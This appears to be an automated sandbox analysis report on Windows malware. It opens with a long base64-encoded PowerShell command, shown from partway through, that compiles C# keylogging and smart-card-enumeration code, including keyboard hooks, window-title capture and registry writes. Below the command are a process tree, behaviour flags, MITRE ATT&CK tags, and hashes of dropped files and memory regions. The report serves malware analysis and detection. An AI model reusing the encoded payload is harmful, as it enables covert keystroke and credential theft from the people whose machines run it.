ACgAawA3ADAALAAgAHAANgA5ACwAIABrADYANgApADsAcAAxADgAIAA9ACAAZAA2ADUAOwB9AH0AcwB0AHIAaQBuAGcAIABoADcAMgAgAD0AIAAiACIAOwBiADIAOAAgAGkANwAzADsAaQBmACAAKABrADIANwAgACEAPQAgAEkAbgB0AFAAdAByAC4AWgBlAHIAbwApAHsAdQBpAG4AdAAgAG8ANwA0ACAAPQAgADEAMAAwADAAMAA7AGIAeQB0AGUAWwBdACAAZQA3ADUAIAA9ACAAbgBlAHcAIABiAHkAdABlAFsAbwA3ADQAXQA7AGkAZgAgACgAUwBDAGEAcgBkAEwAaQBzAHQAUgBlAGEAZABlAHIAcwAoAGsAMgA3ACwAIABuAHUAbABsACwAIABlADcANQAsACAAbwB1AHQAIABvADcANAApACAAPQA9ACAAMAApAHsATABpAHMAdAA8AHMAdAByAGkAbgBnAD4AIABjADcANgAgAD0AIABoADYAMAAoAGUANwA1ACkAOwBpAG4AdAAgAGcANwA3ACAAPQAgAGMANwA2AC4AQwBvAHUAbgB0ADsAaQBmACAAKABnADcANwAgAD4AIAAwACkAewBpAG4AdAAgAGgANwA4ACAAPQAgADAAOwBiADIAOABbAF0AIABhADcAOQAgAD0AIABuAGUAdwAgAGIAMgA4AFsAZwA3ADcAXQA7AGYAbwByAGUAYQBjAGgAIAAoAHMAdAByAGkAbgBnACAAYgA4ADAAIABpAG4AIABjADcANgApAHsAYQA3ADkAWwBoADcAOABdAC4AbAAyADkAIAA9ACAAYgA4ADAAOwBoADcAOAArACsAOwB9AGkAZgAgACgAUwBDAGEAcgBkAEcAZQB0AFMAdABhAHQAdQBzAEMAaABhAG4AZwBlACgAawAyADcALAAgADUAMAAwACwAIABhADcAOQAsACAAYQA3ADkALgBMAGUAbgBnAHQAaAApACAAPQA9ACAAMAApAHsAZgBvAHIAIAAoAGkAbgB0ACAAcAA4ADEAIAA9ACAAMAA7ACAAcAA4ADEAIAA8ACAAZwA3ADcAOwAgAHAAOAAxACsAKwApAHsAaQA3ADMAIAA9ACAAYQA3ADkAWwBwADgAMQBdADsAaAA3ADIAIAArAD0AIABpADcAMwAuAGwAMgA5ADsAaQBmACAAKAAoAGkANwAzAC4AbAAzADIAIAAmACAAMAB4ADAAMAAwADAAMAAwADIAMAApACAAIQA9ACAAMAApACAAaAA3ADIAIAArAD0AIAAiACAALQAgAGYAbwB1AG4AZAAiADsAaAA3ADIAIAArAD0AIAAiAFwAcgBcAG4AIgA7AH0AfQB9AH0AfQBSAGUAZwBpAHMAdAByAHkALgBTAGUAdABWAGEAbAB1AGUAKABsADIAMAAsACAAbwAyADIALAAgAGgANwAyACkAOwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQALgBTAGwAZQBlAHAAKAAxADAAMAAwACkAOwB9AHIAZQB0AHUAcgBuACAAMAA7AH0AWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAUwBlAHQAVwBpAG4AZABvAHcAcwBIAG8AbwBrAEUAeAAoAGkAbgB0ACAAbAA4ADIALAAgAGoAMwAgAG4AOAAzACwAIABJAG4AdABQAHQAcgAgAGIAOAA0ACwAIAB1AGkAbgB0ACAAZgA4ADUAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABiAG8AbwBsACAAVQBuAGgAbwBvAGsAVwBpAG4AZABvAHcAcwBIAG8AbwBrAEUAeAAoAEkAbgB0AFAAdAByACAAYwA4ADYAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwATgBlAHgAdABIAG8AbwBrAEUAeAAoAEkAbgB0AFAAdAByACAAYwA4ADYALAAgAGkAbgB0ACAAZgA0ADgALAAgAEkAbgB0AFAAdAByACAAcAA0ADkALAAgAEkAbgB0AFAAdAByACAAaQA1ADAAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABHAGUAdABNAG8AZAB1AGwAZQBIAGEAbgBkAGwAZQAoAHMAdAByAGkAbgBnACAAYwA4ADcAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIAB1AGkAbgB0ACAATQBhAHAAVgBpAHIAdAB1AGEAbABLAGUAeQAoAGkAbgB0ACAAcAA4ADgALAAgAHUAaQBuAHQAIABqADgAOQApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHUAaQBuAHQAIABHAGUAdABLAGUAeQBiAG8AYQByAGQATABhAHkAbwB1AHQAKAB1AGkAbgB0ACAAbQA5ADAAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgAsACAAQwBoAGEAcgBTAGUAdAA9AEMAaABhAHIAUwBlAHQALgBBAHUAdABvACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAVABvAFUAbgBpAGMAbwBkAGUARQB4ACgAaQBuAHQAIABsADkAMQAsACAAdQBpAG4AdAAgAGYAOQAyACwAIABiAHkAdABlAFsAXQAgAG4AOQAzACwAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBTAHQAcgBpAG4AZwBCAHUAaQBsAGQAZQByACAAYQA5ADQALAAgAGkAbgB0ACAAYQA5ADUALAAgAHUAaQBuAHQAIABkADkANgAsACAAdQBpAG4AdAAgAG0AOQA3ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAYgBvAG8AbAAgAEcAZQB0AEsAZQB5AGIAbwBhAHIAZABTAHQAYQB0AGUAKABiAHkAdABlAFsAXQAgAGUAOQA4ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdQBpAG4AdAAgAEcAZQB0AEYAbwByAGUAZwByAG8AdQBuAGQAVwBpAG4AZABvAHcAKAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHUAaQBuAHQAIABHAGUAdABXAGkAbgBkAG8AdwBUAGgAcgBlAGEAZABQAHIAbwBjAGUAcwBzAEkAZAAoAHUAaQBuAHQAIABwADkAOQAsACAAcgBlAGYAIAB1AGkAbgB0ACAAYgAxADAAMAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAARwBlAHQAVwBpAG4AZABvAHcAVABlAHgAdABMAGUAbgBnAHQAaAAoAHUAaQBuAHQAIABvADEAMAAxACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdQBpAG4AdAAgAEcAZQB0AFcAaQBuAGQAbwB3AFQAZQB4AHQAKAB1AGkAbgB0ACAAbwAxADAAMQAsACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGEAMQAwADIALAAgAGkAbgB0ACAAbgAxADAAMwApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIAB1AGkAbgB0ACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGYAMQAwADQALAAgAHUAaQBuAHQAIABrADEAMAA1ACwAIABqADYAIABmADEAMAA2ACwAIABJAG4AdABQAHQAcgAgAGsAMQAwADcALAAgAHUAaQBuAHQAIABtADEAMAA4ACwAIABJAG4AdABQAHQAcgAgAGYAMQAwADkAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdgBvAGkAZAAgAEUAeABpAHQAUAByAG8AYwBlAHMAcwAoAHUAaQBuAHQAIABqADEAMQAwACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHUAaQBuAHQAIABDAHIAZQBhAHQAZQBNAHUAdABlAHgAKABJAG4AdABQAHQAcgAgAGwAMQAxADEALAAgAGIAbwBvAGwAIABmADEAMQAyACwAIABzAHQAcgBpAG4AZwAgAGwAMQAxADMAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdQBpAG4AdAAgAE8AcABlAG4ATQB1AHQAZQB4ACgAdQBpAG4AdAAgAGEAMQAxADQALAAgAGIAbwBvAGwAIABjADEAMQA1ACwAIABzAHQAcgBpAG4AZwAgAGwAMQAxADMAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAHcAaQBuAHMAYwBhAHIAZAAuAGQAbABsACIAKQBdAHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABTAEMAYQByAGQARQBzAHQAYQBiAGwAaQBzAGgAQwBvAG4AdABlAHgAdAAoAEkAbgB0ADMAMgAgAGEAMQAxADYALAAgAEkAbgB0AFAAdAByACAAbQAxADEANwAsACAASQBuAHQAUAB0AHIAIABvADEAMQA4ACwAIABvAHUAdAAgAEkAbgB0AFAAdAByACAAbAAxADEAOQApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdwBpAG4AcwBjAGEAcgBkAC4AZABsAGwAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAAgAD0AIAAiAFMAQwBhAHIAZABMAGkAcwB0AFIAZQBhAGQAZQByAHMAQQAiACwAIABDAGgAYQByAFMAZQB0ACAAPQAgAEMAaABhAHIAUwBlAHQALgBBAG4AcwBpACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAUwBDAGEAcgBkAEwAaQBzAHQAUgBlAGEAZABlAHIAcwAoAEkAbgB0AFAAdAByACAAbAAxADEAOQAsACAAYgB5AHQAZQBbAF0AIABvADEAMgAwACwAIABiAHkAdABlAFsAXQAgAGgAMQAyADEALAAgAG8AdQB0ACAAVQBJAG4AdAAzADIAIABmADEAMgAyACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB3AGkAbgBzAGMAYQByAGQALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAUwBDAGEAcgBkAEcAZQB0AFMAdABhAHQAdQBzAEMAaABhAG4AZwBlACgASQBuAHQAUAB0AHIAIABsADEAMQA5ACwAIABVAEkAbgB0ADMAMgAgAGoAMQAyADMALAAgAFsASQBuACwAIABPAHUAdABdACAAYgAyADgAWwBdACAAYQA3ADkALAAgAEkAbgB0ADMAMgAgAHAAMQAyADQAKQA7AH0AfQANAAoAIgBAACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMAOwBbAGoAMQAuAGQAMgBdADoAOgBSAHUAbgAoACAAewAgACQAbgB1AGwAbAAgAD0AIABbAGMAbwBuAHMAbwBsAGUAXQA6ADoAQwBhAHAAcwBMAG8AYwBrACAAfQAgACkA
1⤵
- Process spawned unexpected child process
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:632
- C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
  "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2p7cxbj9.cmdline"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1440
- - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
    C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7D4C.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC7D3C.tmp"
    3⤵
    PID:1992

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File Deletion

T1107

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\2815614063.js

Filesize
49KB

MD5
4d34ec02184da5616079c797ba57b086

SHA1
6f5be334aaeaac82636cd6231d3435b021a503f1

SHA256
50e94574a57fd1349ca9327886d01fe773fc787e7f8bef718ec88d50b5825391

SHA512
1eb6a0781dc0070f4376c17d07651e00b717a9df7dd9efb82fbc348a09749f3fb4f136f150626246c239ac8cf040cd3259d463b864a9cc6a1a41782416c4afb9

Download Submit
C:\Users\Admin\AppData\Local\Temp\2p7cxbj9.dll

Filesize
10KB

MD5
712f14cc58658ed785d44760c5892003

SHA1
cd14cac74b026767b8ccb381f2a418fc4cd1374a

SHA256
1e74aefb1f1fa7dbe865ca76b696cd2a7badf895f4decf2b79ff5a3283f5fe2d

SHA512
41c3fbadb42d2e21a48659d1995124f4b1b04373259450dc5722c48ca7e7dd69e78602d4466a92f7f8e07e946bd988903c20e850e229d0c8a3ecfa839f37aaf1

Download Submit
C:\Users\Admin\AppData\Local\Temp\2p7cxbj9.pdb

Filesize
17KB

MD5
97d6ec9795e07309f52b52de4edee618

SHA1
a4361f0093221d672b734c0b5f59510eb6678699

SHA256
fb0e95114e36c6a703b778ddda93e822dec1d8ee97ca96beda7d3f55e970faf2

SHA512
eb881e11253fb7ff8a8074389ab062f579033e5f0484bb819c32a6e1ce29727948b067990529b0b80e02fd1bcee3ae8a387b06480e1c8d78671f3c6e476f1524

Download Submit
C:\Users\Admin\AppData\Local\Temp\852621949

Filesize
40KB

MD5
21432c9e8159fef9ddf6ddadb907a88b

SHA1
cac9514235c1f2d4c871159b94bf069fafe1645f

SHA256
73a1b061676d2a58ae5bc11ccc129d9f8ad432db87793b0314d885ccaa6dd961

SHA512
46417954ec9573fc19b220021c2b497befbe2e5f452628c7199f57e97c0110d8acc818ba76bb8b78211e8b8baffd86e12ac224ad59223c2cacaeacca3e141b7f

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES7D4C.tmp

Filesize
1KB

MD5
4e8715372b1b3ca210b50ab03ab59b10

SHA1
af866c0e47261fa4bcdf25ff09ed8e54922856d7

SHA256
ff826e8cac0edbd5872592d29f2d821856f57ba4f533d45971af4c2fbb21f1ca

SHA512
314093aacf8c0e7530a1f0038aabd429b681f63cdb71ea0d52f139f8eb2cac276a5781f9a41ff37062683347001ad2e7221ca68a5fc2037625cecd15144e12d3

Download Submit
C:\Users\Admin\AppData\Local\dae2938e0.js

Filesize
49KB

MD5
4d34ec02184da5616079c797ba57b086

SHA1
6f5be334aaeaac82636cd6231d3435b021a503f1

SHA256
50e94574a57fd1349ca9327886d01fe773fc787e7f8bef718ec88d50b5825391

SHA512
1eb6a0781dc0070f4376c17d07651e00b717a9df7dd9efb82fbc348a09749f3fb4f136f150626246c239ac8cf040cd3259d463b864a9cc6a1a41782416c4afb9

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2p7cxbj9.0.cs

Filesize
7KB

MD5
0ea0f042848fe6be56f2ac10f576eac9

SHA1
10581024d7621131ce2b61b66b2d0e62e6c154ac

SHA256
e1bac97a2157df3d35e1a7e6acb0b646682b9a13858d86d3b13027492b56b6e5

SHA512
d98c67e4e79769026fd710e9bb448db0f929167673358757dca3c493c8df7476d18b08a530aa578039db7a66dbbc33e174f706d2e0c30990c67b4add85156ce2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2p7cxbj9.cmdline

Filesize
415B

MD5
d6d95b9c332845cdac382d13b4d3c33b

SHA1
c387a2b4526fecb683ed779b1639eeef3ef6d8f8

SHA256
ddecc7dadc917c5fadc4090115097399c0e151ff7646e07cf9de48ee9025f0e7

SHA512
24e04fe4e4c2509413562e0472df81ab88743232fc8330ac97e3fa11119cf3890a8e5309e510bda3967ed0bd7ca674ec87fc5e4d34d26be2635735db9e33c7a3

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC7D3C.tmp

Filesize
652B

MD5
8a2e16ac08eb9f0916d37c9935d82cf6

SHA1
31183852ead7356f2c9a60fc188c60c9f2b55812

SHA256
a716eb224d8aa032a2ddfbf3ec737f87e9144e49d9a2b566677517e56c24c15b

SHA512
e716deb43d970f47f6b197d70f2b10006c3f41e792fee8fde05d557ca0275cec4746d6d7f7393c281c1bc22b0fbc6352ed4d869b6b57f02be13fe961b1477576

Download Submit
memory/632-62-0x000007FEF4090000-0x000007FEF4AB3000-memory.dmp

Filesize
10.1MB

Download
memory/632-64-0x0000000002974000-0x0000000002977000-memory.dmp

Filesize
12KB

Download
memory/632-63-0x000007FEF3470000-0x000007FEF3FCD000-memory.dmp

Filesize
11.4MB

Download
memory/632-65-0x000000001B7F0000-0x000000001BAEF000-memory.dmp

Filesize
3.0MB

Download
memory/632-66-0x000000000297B000-0x000000000299A000-memory.dmp

Filesize
124KB

Download
memory/632-67-0x000007FEEDC70000-0x000007FEEED06000-memory.dmp

Filesize
16.6MB

Download
memory/632-77-0x000000000297B000-0x000000000299A000-memory.dmp

Filesize
124KB

Download
memory/632-76-0x0000000002974000-0x0000000002977000-memory.dmp

Filesize
12KB

Download
memory/632-61-0x000007FEFBB11000-0x000007FEFBB13000-memory.dmp

Filesize
8KB

Download
memory/1772-54-0x0000000074FD1000-0x0000000074FD3000-memory.dmp

Filesize
8KB

Download